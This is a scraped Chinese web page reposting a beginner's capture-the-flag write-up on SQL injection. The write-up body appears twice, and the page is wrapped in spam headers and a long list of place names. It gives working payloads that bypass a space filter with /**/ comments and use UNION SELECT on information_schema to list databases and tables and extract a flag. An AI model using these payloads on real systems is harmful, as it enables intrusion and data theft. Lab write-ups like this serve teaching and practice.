国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 數據庫 > SQL Server > 正文

分享一個簡單的sql注入

2024-08-31 01:04:59
字體:
來源:轉載
供稿:網友

所謂SQL注入,就是通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字符串,最終達到欺騙服務器執行惡意的SQL命令。具體來說,它是利用現有應用程序,將(惡意)的SQL命令注入到后臺數據庫引擎執行的能力,它可以通過在Web表單中輸入(惡意)SQL語句得到一個存在安全漏洞的網站上的數據庫,而不是按照設計者意圖去執行SQL語句。比如先前的很多影視網站泄露VIP會員密碼大多就是通過WEB表單遞交查詢字符暴出的,這類表單特別容易受到sql注入攻擊。

分別輸入1,2,3有對應的結果

sql,注入

使用'會報錯,于是

構造常用的sql語句:1' and '1'='1

sql,注入

沒有反應試一試1' and '1'='2

sql,注入

還是沒反應,工具提示,應該是過濾了什么,改一下sql語句試一試

1and1=1

sql,注入

可以顯示東西,經過判斷過濾了空格,我們使用/**/來代替空格

試一試1'/**/and/**/'1'='1

發現有結果了:

于是構建sql語句:

判斷有那些數據庫:

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

可以看到結果:

sql,注入

查看有哪些數據表:

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

sql,注入

發現了flag的表,我們猜測應該是在web1數據庫中并且字段就是flag(其實就在本頁面的數據庫中)

故:

1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1

sql,注入

本人也是初學者,參考了許多大佬的wp 自己寫出來后有什么錯誤的地方,希望大家指出,謝謝!

根據頁面提示,到底過濾了什么東西?可以知道一定過濾了什么....

分別輸入1,2,3有對應的結果

sql,注入

使用'會報錯,于是

構造常用的sql語句:1' and '1'='1

sql,注入

沒有反應試一試1' and '1'='2

sql,注入

還是沒反應,工具提示,應該是過濾了什么,改一下sql語句試一試

1and1=1

sql,注入

可以顯示東西,經過判斷過濾了空格,我們使用/**/來代替空格

試一試1'/**/and/**/'1'='1

發現有結果了:

于是構建sql語句:

判斷有那些數據庫:

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

可以看到結果:

sql,注入

查看有哪些數據表:

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

sql,注入

發現了flag的表,我們猜測應該是在web1數據庫中并且字段就是flag(其實就在本頁面的數據庫中)

故:

1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1

sql,注入

總結

以上所述是小編給大家介紹的一個簡單的sql注入,希望對大家有所幫助,如果大家有任何疑問請給我留言,小編會及時回復大家的。在此也非常感謝大家對VeVb武林網網站的支持!


注:相關教程知識閱讀請移步到MSSQL教程頻道。
發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 南汇区| 郑州市| 黄陵县| 辛集市| 疏附县| 河北省| 靖江市| 红安县| 灵寿县| 文化| 大丰市| 城口县| 廉江市| 大竹县| 板桥市| 资溪县| 邢台县| 潼关县| 荣成市| 高淳县| 鹤壁市| 申扎县| 东海县| 大石桥市| 汉沽区| 瑞昌市| 平塘县| 东台市| 利辛县| 清徐县| 河北省| 千阳县| 浦北县| 济阳县| 南充市| 襄垣县| 望奎县| 荥阳市| 浦江县| 松滋市| 神农架林区|